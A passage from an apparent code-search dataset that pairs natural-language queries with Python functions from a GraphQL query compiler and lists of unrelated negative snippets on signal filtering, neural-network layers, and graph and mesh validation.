"def __call__(self, sample_block: np.ndarray) -> List[Dict[Tuple[int, int], float]]:\n\n assert len(sample_block) == self._sample_rate\n buffered_sample_block = self._buffer_sample_block(sample_block)\n\n shared_sample_block = np.ndarray(\n (len(buffered_sample_block),),\n dtype=np.float32,\n buffer=self.shared_sample_block_memory.buf,\n )\n\n shared_sample_block[:] = buffered_sample_block[:]\n\n # tell children to get to work\n for bandpass_filter in self._bandpass_filters.values():\n bandpass_filter()\n LOGGER.debug(\"all filters processing\")\n\n # collect the results into a list\n bin_intensities_list: List[Tuple[Tuple[int, int], np.ndarray]] = []\n for bin_, bandpass_filter in self._bandpass_filters.items():\n intensity_list = []\n filtered_sample_block = bandpass_filter.result\n\n # split filtered samples into buffers\n for buffer in filtered_sample_block.reshape(\n int(len(filtered_sample_block) / self._buffer_size), self._buffer_size\n ):\n energy = float(dsp.get_rms(buffer))\n max_energy = bandpass_filter.max_energy_tracker(energy)\n if not max_energy:\n intensity = 0\n else:\n intensity = energy / max_energy\n intensity_list.append(intensity)\n bin_intensities_list.append((bin_, np.array(intensity_list)))\n LOGGER.debug(\"all results recieved\")\n\n # filterbanks return a random order, sort them into a 2d array\n bin_intensities_list.sort()\n bin_intensities_array = np.zeros(\n (len(bin_intensities_list), len(bin_intensities_list[0][1])),\n dtype=bin_intensities_list[0][1].dtype,\n )\n for i, (_, intensities) in enumerate(bin_intensities_list):\n bin_intensities_array[i] = intensities[:]\n\n # create a bin-intensity mapping for each buffer\n bin_intensity_mapping_list = []\n for intensity_array in bin_intensities_array.swapaxes(0, 1):\n bin_intensity_mapping = {}\n for bin_, intensity in zip(self._bandpass_filters, intensity_array):\n bin_intensity_mapping[bin_] = float(intensity)\n bin_intensity_mapping_list.append(bin_intensity_mapping)\n\n return bin_intensity_mapping_list",
"def preprocess_filters(x, Fs):\n # Low pass at 200Hz\n x_lo = neurodsp.filter(x, Fs, 'lowpass', f_lo=200, N_seconds=.1)\n\n # Highpass at 2Hz - figure out order\n x_hi = neurodsp.filter(x_lo, Fs, 'highpass', f_hi=2, N_seconds=2)\n\n # Notch filter at 60Hz, 120Hz and 180Hz\n N_seconds = .5\n x_notch = neurodsp.filter(x_hi, Fs, 'bandstop', f_lo=58, f_hi=62, N_seconds=N_seconds)\n x_notch = neurodsp.filter(x_notch, Fs, 'bandstop', f_lo=118, f_hi=122, N_seconds=N_seconds)\n x_notch = neurodsp.filter(x_notch, Fs, 'bandstop', f_lo=178, f_hi=182, N_seconds=N_seconds)\n\n return x_notch",
"def _cpu_line_uniform_filter_without_loops(image, output, filter_size, parallelism=8):\n\n length = image.shape[0]\n chunk_length = int(ceil(length / parallelism))\n\n for c in prange(parallelism):\n for k in range(chunk_length):\n i = k + c * chunk_length\n if i < length:\n input_line = image[i, :]\n output_line = output[i, :]\n _cpu_line_filter(input_line, output_line, filter_size)\n\n # print(cpu_line_filter.inspect_llvm())",
"def fp_pointwise_transition_block(\n self, x: tf.Tensor, filters: int, strides: int, use_squeeze_and_excite: bool\n ) -> tf.Tensor:\n residual = tf.keras.layers.MaxPool2D(pool_size=strides, strides=strides)(x)\n residual = tf.keras.layers.Conv2D(\n filters, kernel_size=1, use_bias=False, kernel_initializer=\"glorot_normal\"\n )(residual)\n residual = tf.keras.layers.BatchNormalization(momentum=0.9, epsilon=1e-5)(\n residual\n )\n x = self.conv_block(x, filters, use_squeeze_and_excite, strides)\n return tf.keras.layers.add([x, residual])",
"def transform_block_filters(self, usage_info, block_structure):\n raise NotImplementedError",
"def stack(x, filters, n, downsampling, name=None):\n\n x = block(x, filters, downsampling, name=f\"{name}_block1\")\n for i in range(2, n + 1):\n x = block(x, filters, downsampling=False, name=f\"{name}_block{i}\")\n return x",
"def stream_forward(\n self, x: torch.Tensor, buffers: dict\n ) -> Tuple[torch.Tensor, dict]:\n assert x.size(0) == x.size(2) == 1\n # Just copying dict items, no tensors involved\n buffers = buffers.copy()\n skip_shape = (1, self.skip_channels, 1)\n skip = torch.zeros(skip_shape, dtype=x.dtype, device=x.device)\n x = self.input_conv(x)\n\n for i, block in enumerate(self.blocks):\n assert x.size(2) == 1\n residual = x\n\n dilated_outs = {}\n for sub in (\"gate\", \"filter\"):\n key = f\"block-{i}-{sub}\"\n dilated_outs[sub], buffers[key] = self.lazy_conv(\n x, block[f\"{sub}_conv\"], buffers[key], block.meta.dilation\n )\n\n filter_out = torch.tanh(dilated_outs[\"filter\"])\n gate_out = torch.sigmoid(dilated_outs[\"gate\"])\n x = filter_out * gate_out\n x_skip = block[\"skip_conv\"](x)\n skip += x_skip\n x = block[\"residual_conv\"](x)\n x = residual + x\n x = block[\"batch_norm\"](x)\n assert x.size(2) == 1\n\n out = self.output_convs(skip)\n buffers[\"out\"] = torch.cat((buffers[\"out\"][:, :, 1:], out), dim=2)\n buffers[\"out\"][:, :, 0] = 0\n assert buffers[\"out\"].size(2) == self.input_size\n out = self.output_dense(buffers[\"out\"])\n return out, buffers"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Validate that the OutputContextVertex is correctly representable.
|
def validate(self):
super(OutputContextVertex, self).validate()
if self.location.field is not None:
raise ValueError(u'Expected location at a vertex, but got: {}'.format(self.location))
|
[
"def validate(self, model_output_shape: Tuple, target_shape: Tuple) -> None:\n raise NotImplementedError",
"def is_vertex(self) -> \"bool\":\n return self._value.getType() == Value.VVAL",
"def is_vertex(ent):\n if isinstance(ent, tuple):\n if len(ent) in [2, 3]:\n return True\n elif isinstance(ent, Point):\n return True\n return False",
"def isConnectedToVertex(*args, **kwargs):\n \n pass",
"def _validate(self):\n # check that element connectivity contains integers\n # NOTE: this is neccessary for some plotting functionality\n if not np.issubdtype(self.t[0, 0], np.signedinteger):\n msg = (\"Mesh._validate(): Element connectivity \"\n \"must consist of integers.\")\n raise Exception(msg)\n # check that vertex matrix has \"correct\" size\n if self.p.shape[0] > 3:\n msg = (\"Mesh._validate(): We do not allow meshes \"\n \"embedded into larger than 3-dimensional \"\n \"Euclidean space! Please check that \"\n \"the given vertex matrix is of size Ndim x Nvertices.\")\n raise Exception(msg)\n # check that element connectivity matrix has correct size\n nvertices = {'line': 2, 'tri': 3, 'quad': 4, 'tet': 4, 'hex': 8}\n if self.t.shape[0] != nvertices[self.refdom]:\n msg = (\"Mesh._validate(): The given connectivity \"\n \"matrix has wrong shape!\")\n raise Exception(msg)\n # check that there are no duplicate points\n tmp = np.ascontiguousarray(self.p.T)\n if self.p.shape[1] != np.unique(tmp.view([('', tmp.dtype)]\n * tmp.shape[1])).shape[0]:\n msg = \"Mesh._validate(): Mesh contains duplicate vertices.\"\n warnings.warn(msg)\n # check that all points are at least in some element\n if len(np.setdiff1d(np.arange(self.p.shape[1]), np.unique(self.t))) > 0:\n msg = (\"Mesh._validate(): Mesh contains a vertex \"\n \"not belonging to any element.\")\n raise Exception(msg)",
"def get_out_vertex(self):",
"def _validateVertex(self, v):\n V = len(self._rank)\n if v < 0 or v >= V:\n raise Exception(\"vertex {} is not between 0 and {}\".format(v, (V-1))\n\n# Copyright 2002-2016, Robert Sedgewick and Kevin Wayne.\n# Copyright 2002-2016, DV Klopfenstein, Python port",
"def test_has_vert_filled_wrong(graph_one):\n assert graph_one.has_vert(\"X\") is False",
"def isVertex(self, x):\n if x < 0:\n raise ValidException(\"Invalid vertex.\")\n return x in self.__inbound_neighbours.keys()",
"def test_has_vert_filled(graph_one):\n\n assert graph_one.has_vert(\"C\") is True",
"def _validate_graph(self, G):\n for (v1, v2) in G.edges():\n if 'object' not in G.edges[v1, v2].keys():\n raise ValueError(\"edge_object for ({}, {}) is missing\".format(v1, v2))\n edge_object = G.edges[v1, v2]['object']\n if 'col' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'col' field\".format(v1, v2))\n if 'lookup' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'lookup' field\".format(v1, v2))\n if 'field' not in edge_object.keys():\n raise ValueError(\"edge_object for ({}, {}) is missing the 'field' field\".format(v1, v2))",
"def test_undirected_graph_vertex_already_exists(self):\n g = UndirectedGraph()\n g.add_vertex(v_val='v0')\n\n with self.assertRaises(ValueError):\n g.add_vertex(v_val='v0')",
"def has_vertex(self,v):\n return v in self.graph",
"def test_directed_graph_vertex_already_exists(self):\n g = DirectedGraph()\n g.add_vertex(v_val='v0')\n\n with self.assertRaises(ValueError):\n g.add_vertex('v0')",
"def valid_model_component(self):\n return True",
"def can_convert(self) -> bool:\n for w in self.required_weights:\n if w not in self.importer_node.weights:\n return False\n for attr in self.required_attributes:\n if attr not in self.importer_node.attributes:\n return False\n return True",
"def test_vertex_only(self):\n\n v = g.random((1000, 3))\n v[g.np.floor(g.random(90) * len(v)).astype(int)] = v[0]\n\n mesh = g.trimesh.Trimesh(v)\n\n assert len(mesh.vertices) < 950\n assert len(mesh.vertices) > 900",
"def testVertex(self):\n v = Vertex.makeVertex(1, 1, 1)\n self.assertEqual(1, v.X)\n self.assertEqual(Vector, type(v.Center()))",
"def _validate_edge(self, edge: Edge):\n\n # Validate that the nodes exist (edges may contain node paths, so we can't just check for nodes directly)\n try:\n from_node = self.get_node(edge.source.node_id)\n to_node = self.get_node(edge.destination.node_id)\n except NodeNotFoundError:\n raise InvalidEdgeError(\"One or both nodes don't exist: {edge.source.node_id} -> {edge.destination.node_id}\")\n\n # Validate that an edge to this node+field doesn't already exist\n input_edges = self._get_input_edges(edge.destination.node_id, edge.destination.field)\n if len(input_edges) > 0 and not isinstance(to_node, CollectInvocation):\n raise InvalidEdgeError(\n f\"Edge to node {edge.destination.node_id} field {edge.destination.field} already exists\"\n )\n\n # Validate that no cycles would be created\n g = self.nx_graph_flat()\n g.add_edge(edge.source.node_id, edge.destination.node_id)\n if not nx.is_directed_acyclic_graph(g):\n raise InvalidEdgeError(\n f\"Edge creates a cycle in the graph: {edge.source.node_id} -> {edge.destination.node_id}\"\n )\n\n # Validate that the field types are compatible\n if not are_connections_compatible(from_node, edge.source.field, to_node, edge.destination.field):\n raise InvalidEdgeError(\n f\"Fields are incompatible: cannot connect {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if iterator output type matches iterator input type (if this edge results in both being set)\n if isinstance(to_node, IterateInvocation) and edge.destination.field == \"collection\":\n if not self._is_iterator_connection_valid(edge.destination.node_id, new_input=edge.source):\n raise InvalidEdgeError(\n f\"Iterator input type does not match iterator output type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if iterator input type matches output type (if this edge results in both being set)\n if isinstance(from_node, IterateInvocation) and edge.source.field == \"item\":\n if not self._is_iterator_connection_valid(edge.source.node_id, new_output=edge.destination):\n raise InvalidEdgeError(\n f\"Iterator output type does not match iterator input type:, {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if collector input type matches output type (if this edge results in both being set)\n if isinstance(to_node, CollectInvocation) and edge.destination.field == \"item\":\n if not self._is_collector_connection_valid(edge.destination.node_id, new_input=edge.source):\n raise InvalidEdgeError(\n f\"Collector output type does not match collector input type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )\n\n # Validate if collector output type matches input type (if this edge results in both being set)\n if isinstance(from_node, CollectInvocation) and edge.source.field == \"collection\":\n if not self._is_collector_connection_valid(edge.source.node_id, new_output=edge.destination):\n raise InvalidEdgeError(\n f\"Collector input type does not match collector output type: {edge.source.node_id}.{edge.source.field} to {edge.destination.node_id}.{edge.destination.field}\"\n )",
"def is_vertex(self, vertex):\n\n return vertex in self.adjacency_dict.keys()"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Lower ContextFieldExistence expressions into lower-level expressions.
|
def lower_context_field_existence(ir_blocks, query_metadata_table):
    def regular_visitor_fn(expression):
        """Expression visitor function that rewrites ContextFieldExistence expressions."""
        if not isinstance(expression, ContextFieldExistence):
            return expression

        location_type = query_metadata_table.get_location_info(expression.location).type

        # Since this function is only used in blocks that aren't ConstructResult,
        # the location check is performed using a regular ContextField expression.
        return BinaryComposition(
            u'!=',
            ContextField(expression.location, location_type),
            NullLiteral)

    def construct_result_visitor_fn(expression):
        """Expression visitor function that rewrites ContextFieldExistence expressions."""
        if not isinstance(expression, ContextFieldExistence):
            return expression

        location_type = query_metadata_table.get_location_info(expression.location).type

        # Since this function is only used in ConstructResult blocks,
        # the location check is performed using the special OutputContextVertex expression.
        return BinaryComposition(
            u'!=',
            OutputContextVertex(expression.location, location_type),
            NullLiteral)

    new_ir_blocks = []
    for block in ir_blocks:
        new_block = None
        if isinstance(block, ConstructResult):
            new_block = block.visit_and_update_expressions(construct_result_visitor_fn)
        else:
            new_block = block.visit_and_update_expressions(regular_visitor_fn)
        new_ir_blocks.append(new_block)

    return new_ir_blocks
|
[
"def regular_visitor_fn(expression):\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in blocks that aren't ConstructResult,\n # the location check is performed using a regular ContextField expression.\n return BinaryComposition(\n u'!=',\n ContextField(expression.location, location_type),\n NullLiteral)",
"def _ensure_node_in_anf(self, parent, field, node):\n if node is None:\n return node\n if _is_trivial(node):\n return node\n if isinstance(node, list):\n # If something's field was actually a list, e.g., variadic arguments.\n return [self._ensure_node_in_anf(parent, field, n) for n in node]\n if isinstance(node, gast.keyword):\n node.value = self._ensure_node_in_anf(parent, field, node.value)\n return node\n if isinstance(node, (gast.Starred, gast.withitem, gast.slice)):\n # These nodes aren't really extractable in their own right, but their\n # subnodes might be. Propagate the parent and field name to the child\n # nodes, instead of querying the configuration for children of, e.g.,\n # gast.Starred.\n return self._ensure_fields_in_anf(node, parent, field)\n if self._should_transform(parent, field, node):\n return self._do_transform_node(node)\n else:\n return node",
"def rewrite(expr: ResolvedExpression) -> None:\n if (\n isinstance(expr, FieldAccess.Expr)\n and isinstance(expr.abstract_expr, Super)\n and expr.node_data == prop\n ):\n expr.node_data = root_static\n\n for subexpr in expr.flat_subexprs(\n lambda e: isinstance(e, ResolvedExpression)\n ):\n rewrite(subexpr)",
"def evaluate(field):\n pass",
"def lower_ir(schema_info, ir):\n sanity_check_ir_blocks_from_frontend(ir.ir_blocks, ir.query_metadata_table)\n\n ir_blocks = insert_explicit_type_bounds(\n ir.ir_blocks,\n ir.query_metadata_table,\n type_equivalence_hints=schema_info.type_equivalence_hints,\n )\n\n ir_blocks = remove_mark_location_after_optional_backtrack(ir_blocks, ir.query_metadata_table)\n ir_blocks = lower_context_field_existence(ir_blocks, ir.query_metadata_table)\n ir_blocks = replace_local_fields_with_context_fields(ir_blocks)\n ir_blocks = optimize_boolean_expression_comparisons(ir_blocks)\n ir_blocks = merge_consecutive_filter_clauses(ir_blocks)\n ir_blocks = renumber_locations_to_one(ir_blocks)\n\n cypher_query = convert_to_cypher_query(\n ir_blocks,\n ir.query_metadata_table,\n type_equivalence_hints=schema_info.type_equivalence_hints,\n )\n\n cypher_query = move_filters_in_optional_locations_to_global_operations(\n cypher_query, ir.query_metadata_table\n )\n\n return cypher_query",
"def expand_field(self, field):\n if field in self.dtype_c:\n return [field]\n\n subfields = self.get_field_type(field).fields\n if subfields:\n return [ff for ff in self.full_fields if ff.startswith(field)]\n return [field]",
"def get_horizontal_filter():\n user_field = FeatureFlipper.USER_FEATURE_FIELD\n return (user_field, ) if _is_m2m(user_field) else ()",
"def _check_prepopulated_fields_key(self, obj, field_name, label):\n\n try:\n field = obj.model._meta.get_field(field_name)\n except FieldDoesNotExist:\n return refer_to_missing_field(\n field=field_name, option=label, obj=obj, id=\"admin.E027\"\n )\n else:\n if isinstance(\n field, (models.DateTimeField, models.ForeignKey, models.ManyToManyField)\n ):\n return [\n checks.Error(\n \"The value of '%s' refers to '%s', which must not be a \"\n \"DateTimeField, a ForeignKey, a OneToOneField, or a \"\n \"ManyToManyField.\" % (label, field_name),\n obj=obj.__class__,\n id=\"admin.E028\",\n )\n ]\n else:\n return []",
"def filter_access_levels(query, field, access_levels, owner_field = None,\n owner_object = None):\n \n access_filter = reduce(\n lambda q,access_level: q|Q(**{field: access_level}), access_levels, Q())\n if owner_field and owner_object:\n access_filter = access_filter | Q(**{owner_field: owner_object})\n return query.filter(access_filter)",
"def update_fields(self, fields_filter):\n self.fields = [field for field in self._get_available_fields()\n if self.is_field_wanted(fields_filter, field)]\n # add parents for child fields - otherwise we won't see any output!\n for field in self._fields:\n parent = ARCH.tracepoint_is_child(field)\n if (parent and parent not in self._fields):\n self.fields.append(parent)",
"def test_get_nested_filter_operators_validated(self):\n self.app.config[\"VALIDATE_FILTERS\"] = True\n\n where = \"\".join(\n (\n '?where={\"$and\":[{\"$or\":[{\"fldA\":\"valA\"},',\n '{\"fldB\":\"valB\"}]},{\"fld2\":\"val2\"}]}',\n )\n )\n response, status = self.get(self.known_resource, where)\n self.assert400(status)\n\n where = \"\".join(\n (\n '?where={\"$and\":[{\"$or\":[{\"role\":',\n '[\"agent\",\"client\"]},{\"key1\":\"str\"}]}, {\"prog\":1}]}',\n )\n )\n response, status = self.get(self.known_resource, where)\n self.assert200(status)",
"def render_template_fields(\n self,\n context: Context,\n jinja_env: Optional[\"jinja2.Environment\"] = None,\n ) -> Optional[\"BaseOperator\"]:\n raise NotImplementedError()",
"def di_field_check(self, table, fields):\n di_fields = list()\n\n for field in fields:\n di_field = False\n for k, v in excluded_fields.items():\n if k in table:\n if field in v:\n di_field = True\n di_fields.append(f'null as {field}' if di_field else field)\n\n return di_fields",
"def core_is_within_field(cursor_trail, tree, ast_node_type, fieldname):\n\n # A Module isn't within anything\n if cursor_trail == []:\n return False\n\n parent = get_node_at_cursor(cursor_trail[:-1], tree)\n child = get_node_at_cursor(cursor_trail, tree)\n\n # We are within the ast_node_type if our parent is of the type\n # and the fieldname is the specified one\n # or our parent itself is within the ast_node_type with the right field\n\n return (\n (isinstance(parent, ast_node_type) and get_field_name_for_child(parent, child)[0] == fieldname) \n or core_is_within_field(cursor_trail[:-1], tree, ast_node_type, fieldname)\n )",
"def compile_selector_filter(self, selector):\n def get_entity(field_id):\n \"Get field from entity tested by filter\"\n def get_entity_f(e, c):\n return e.get(field_id, None)\n return get_entity_f\n #\n def get_context(name, field_id):\n \"Get field from named value in current display context\"\n def get_context_f(e, c):\n if name in c and c[name]:\n return c[name].get(field_id, None)\n return None\n return get_context_f\n #\n def get_literal(value):\n \"Get literal value specified directly in selector string\"\n def get_literal_f(e, c):\n return value\n return get_literal_f\n #\n def get_val_f(selval):\n if selval['type'] == \"entity\":\n return get_entity(selval['field_id'])\n elif selval['type'] == \"context\":\n return get_context(selval['name'], selval['field_id'])\n elif selval['type'] == \"literal\":\n return get_literal(selval['value'])\n else:\n msg = \"Unrecognized value type from selector (%s)\"%selval['type']\n raise ValueError(msg)\n assert False, \"Unrecognized value type from selector\"\n #\n def match_eq(v1f, v2f):\n def match_eq_f(e, c):\n return v1f(e, c) == v2f(e, c)\n return match_eq_f\n #\n def match_in(v1f, v2f):\n def match_in_f(e, c):\n v1 = v1f(e, c)\n if not v1: return True\n v2 = v2f(e, c)\n if isinstance(v2, list):\n return v1 in v2\n return v1 == v2\n return match_in_f\n #\n def match_subtype(v1f, v2f):\n def match_subtype_f(e, c):\n return self._fieldcomp.subtype(v1f(e, c), v2f(e, c))\n return match_subtype_f\n #\n if selector in {None, \"\", \"ALL\"}:\n return None\n sel = self.parse_selector(selector)\n if not sel:\n msg = \"Unrecognized selector syntax (%s)\"%selector\n raise ValueError(msg)\n v1f = get_val_f(sel['val1'])\n v2f = get_val_f(sel['val2'])\n if sel['comp'] == \"==\":\n return match_eq(v1f, v2f)\n if sel['comp'] == \"in\":\n return match_in(v1f, v2f)\n if sel['comp'] == \"subtype\":\n return match_subtype(v1f, v2f)\n # Drop through: raise error\n msg = \"Unrecognized entity selector (%s)\"%selector\n raise ValueError(msg)",
"def extract_requested_fields(\n info: graphql.execution.base.ResolveInfo,\n fields: List[Union[Field, FragmentSpread]],\n do_convert_to_snake_case: bool = True,\n) -> Dict:\n\n result = {}\n for field in fields:\n\n # Set the `key` as the field name.\n key = field.name.value\n\n # Convert the key from camel-case to snake-case (if required).\n if do_convert_to_snake_case:\n key = to_snake_case(name=key)\n\n # Initialize `val` to `None`. Fields without nested-fields under them\n # will have a dictionary value of `None`.\n val = None\n\n # If the field is of type `Field` then extract the nested fields under\n # the `selection_set` (if defined). These nested fields will be\n # extracted recursively and placed in a dictionary under the field\n # name in the `result` dictionary.\n if isinstance(field, Field):\n if (\n hasattr(field, \"selection_set\") and\n field.selection_set is not None\n ):\n # Extract field names out of the field selections.\n val = extract_requested_fields(\n info=info,\n fields=field.selection_set.selections,\n )\n result[key] = val\n # If the field is of type `FragmentSpread` then retrieve the fragment\n # from `info.fragments` and recursively extract the nested fields but\n # as we don't want the name of the fragment appearing in the result\n # dictionary (since it does not match anything in the ORM classes) the\n # result will simply be result of the extraction.\n elif isinstance(field, FragmentSpread):\n # Retrieve referened fragment.\n fragment = info.fragments[field.name.value]\n # Extract field names out of the fragment selections.\n val = extract_requested_fields(\n info=info,\n fields=fragment.selection_set.selections,\n )\n result = val\n\n return result",
"def field(f):\n yield f",
"def expand_prefix(self, fieldname, prefix):\n\n for fn, text in self.terms_from(fieldname, prefix):\n if fn != fieldname or not text.startswith(prefix):\n return\n yield text",
"def enterLogicalExpressionAnd(self, ctx: RulesParser.LogicalExpressionAndContext):\n\n self.context.operator = LogicalOperator.AND\n self.context.left = ExpressionNode()\n self.context.left.parent = self.context\n self.context = self.context.left"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Expression visitor function that rewrites ContextFieldExistence expressions.
|
def regular_visitor_fn(expression):
    if not isinstance(expression, ContextFieldExistence):
        return expression

    location_type = query_metadata_table.get_location_info(expression.location).type

    # Since this function is only used in blocks that aren't ConstructResult,
    # the location check is performed using a regular ContextField expression.
    return BinaryComposition(
        u'!=',
        ContextField(expression.location, location_type),
        NullLiteral)
|
[
"def lower_context_field_existence(ir_blocks, query_metadata_table):\n def regular_visitor_fn(expression):\n \"\"\"Expression visitor function that rewrites ContextFieldExistence expressions.\"\"\"\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in blocks that aren't ConstructResult,\n # the location check is performed using a regular ContextField expression.\n return BinaryComposition(\n u'!=',\n ContextField(expression.location, location_type),\n NullLiteral)\n\n def construct_result_visitor_fn(expression):\n \"\"\"Expression visitor function that rewrites ContextFieldExistence expressions.\"\"\"\n if not isinstance(expression, ContextFieldExistence):\n return expression\n\n location_type = query_metadata_table.get_location_info(expression.location).type\n\n # Since this function is only used in ConstructResult blocks,\n # the location check is performed using the special OutputContextVertex expression.\n return BinaryComposition(\n u'!=',\n OutputContextVertex(expression.location, location_type),\n NullLiteral)\n\n new_ir_blocks = []\n for block in ir_blocks:\n new_block = None\n if isinstance(block, ConstructResult):\n new_block = block.visit_and_update_expressions(construct_result_visitor_fn)\n else:\n new_block = block.visit_and_update_expressions(regular_visitor_fn)\n new_ir_blocks.append(new_block)\n\n return new_ir_blocks",
"def fieldExists(session, fieldName, fieldValue):\n\treturn session.query(exists().where(fieldName == fieldValue)).scalar()",
"def render_template_fields(\n self,\n context: Context,\n jinja_env: Optional[\"jinja2.Environment\"] = None,\n ) -> Optional[\"BaseOperator\"]:\n raise NotImplementedError()",
"def _ensure_node_in_anf(self, parent, field, node):\n if node is None:\n return node\n if _is_trivial(node):\n return node\n if isinstance(node, list):\n # If something's field was actually a list, e.g., variadic arguments.\n return [self._ensure_node_in_anf(parent, field, n) for n in node]\n if isinstance(node, gast.keyword):\n node.value = self._ensure_node_in_anf(parent, field, node.value)\n return node\n if isinstance(node, (gast.Starred, gast.withitem, gast.slice)):\n # These nodes aren't really extractable in their own right, but their\n # subnodes might be. Propagate the parent and field name to the child\n # nodes, instead of querying the configuration for children of, e.g.,\n # gast.Starred.\n return self._ensure_fields_in_anf(node, parent, field)\n if self._should_transform(parent, field, node):\n return self._do_transform_node(node)\n else:\n return node",
"def hx_visit_expr(self, func_visit):\n self._hx_visit_generic(_hx_visitor_expr, func_visit)",
"def rewrite(expr: ResolvedExpression) -> None:\n if (\n isinstance(expr, FieldAccess.Expr)\n and isinstance(expr.abstract_expr, Super)\n and expr.node_data == prop\n ):\n expr.node_data = root_static\n\n for subexpr in expr.flat_subexprs(\n lambda e: isinstance(e, ResolvedExpression)\n ):\n rewrite(subexpr)",
"def evaluate(field):\n pass",
"def __addIdentWithExp(self, tnode, index_name, exp):\n\n if isinstance(exp, orio.module.loop.ast.NumLitExp) and exp.val == 0:\n return tnode\n\n if isinstance(tnode, orio.module.loop.ast.ExpStmt):\n if tnode.exp:\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n if isinstance(tnode, orio.module.loop.ast.GotoStmt):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.CompStmt):\n tnode.stmts = [\n self.__addIdentWithExp(s, index_name, exp) for s in tnode.stmts\n ]\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.IfStmt):\n tnode.test = self.__addIdentWithExp(tnode.test, index_name, exp)\n tnode.true_stmt = self.__addIdentWithExp(tnode.true_stmt, index_name, exp)\n if tnode.false_stmt:\n tnode.false_stmt = self.__addIdentWithExp(\n tnode.false_stmt, index_name, exp\n )\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.ForStmt):\n if tnode.init:\n tnode.init = self.__addIdentWithExp(tnode.init, index_name, exp)\n if tnode.test:\n tnode.test = self.__addIdentWithExp(tnode.test, index_name, exp)\n if tnode.iter:\n tnode.iter = self.__addIdentWithExp(tnode.iter, index_name, exp)\n tnode.stmt = self.__addIdentWithExp(tnode.stmt, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.TransformStmt):\n err(\n \"orio.module.loop.submodule.unrolljam.transformation internal error: unprocessed transform statement\"\n )\n\n elif isinstance(tnode, orio.module.loop.ast.NumLitExp):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.StringLitExp):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.IdentExp):\n if tnode.name != index_name:\n if self.ufactor == 1:\n return tnode\n else:\n if tnode.name in self.varsToAdd:\n k = orio.module.loop.ast.IdentExp(tnode.name + str(exp))\n return k\n else:\n return tnode\n else:\n add_exp = orio.module.loop.ast.BinOpExp(\n tnode, exp.replicate(), orio.module.loop.ast.BinOpExp.ADD\n )\n return orio.module.loop.ast.ParenthExp(add_exp)\n\n elif isinstance(tnode, orio.module.loop.ast.ArrayRefExp):\n if isinstance(tnode.exp, orio.module.loop.ast.ArrayRefExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n tnode.sub_exp = self.__addIdentWithExp(tnode.sub_exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.FunCallExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n tnode.args = [\n self.__addIdentWithExp(a, index_name, exp) for a in tnode.args\n ]\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.UnaryExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.BinOpExp):\n tnode.lhs = self.__addIdentWithExp(tnode.lhs, index_name, exp)\n tnode.rhs = self.__addIdentWithExp(tnode.rhs, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.ParenthExp):\n tnode.exp = self.__addIdentWithExp(tnode.exp, index_name, exp)\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.NewAST):\n return tnode\n\n elif isinstance(tnode, orio.module.loop.ast.Comment):\n return tnode\n\n else:\n err(\n 'orio.module.loop.submodule.unrolljam.transformation.__addIdentWithExp internal error: unexpected AST type: \"%s\"'\n % tnode.__class__.__name__\n )",
"def visitExistsExpressionAtom(self, ctx: MySqlParser.ExistsExpressionAtomContext) -> SQLToken:\n select_statement = self.visit(ctx.selectStatement())\n return SQLToken(FUNC, ('exits', select_statement))",
"def _check_field(table, field, name, type_):\n columns = [getattr(table.columns, key) for key in table.columns.keys()]\n\n # If ‘field’ is not specified, we try to autodetect it from the columns\n # of the table based on ‘type_’.\n if field is None:\n candidates = filter(lambda c: isinstance(c.type, type_), columns)\n if len(candidates) == 1:\n field = candidates[0]\n else:\n field = 'tree_' + name\n\n # We assume that we'll be passed either a string or a SQLAlchemy Column\n # object (duck typing is not allowed). If what we're passed is a Column\n # object, we just need to check that\n if not isinstance(field, basestring):\n assert isinstance(field, sqlalchemy.Column)\n assert field.table is table\n\n # Otherwise we're passed a string, and either we find a field with that\n # name in the existing table Columns (likely but not necessarily if the\n # developer specified their own field name), or we'll have to create a\n # new column of the specified name and type, and insert it into the\n # table's column descriptions.\n elif field in table.columns:\n # Column exists:\n field = table.columns[field]\n else:\n # Column not found; create it:\n field = sqlalchemy.Column(field, type_(), nullable=False)\n table.append_column(field)\n # And return (since we know the following checks are redundant):\n return field\n\n # If we found the column or the developer specified it directly, we'll\n # do a quick sanity check to make sure that the column has the right\n # type and meta-attributes:\n assert isinstance(field.type, type_), \\\n \"The type of %s field should be %r\" % (name, type_)\n assert not field.nullable, \\\n \"The %s field should not be nullable\" % name\n\n # Field passes; return to caller:\n return field",
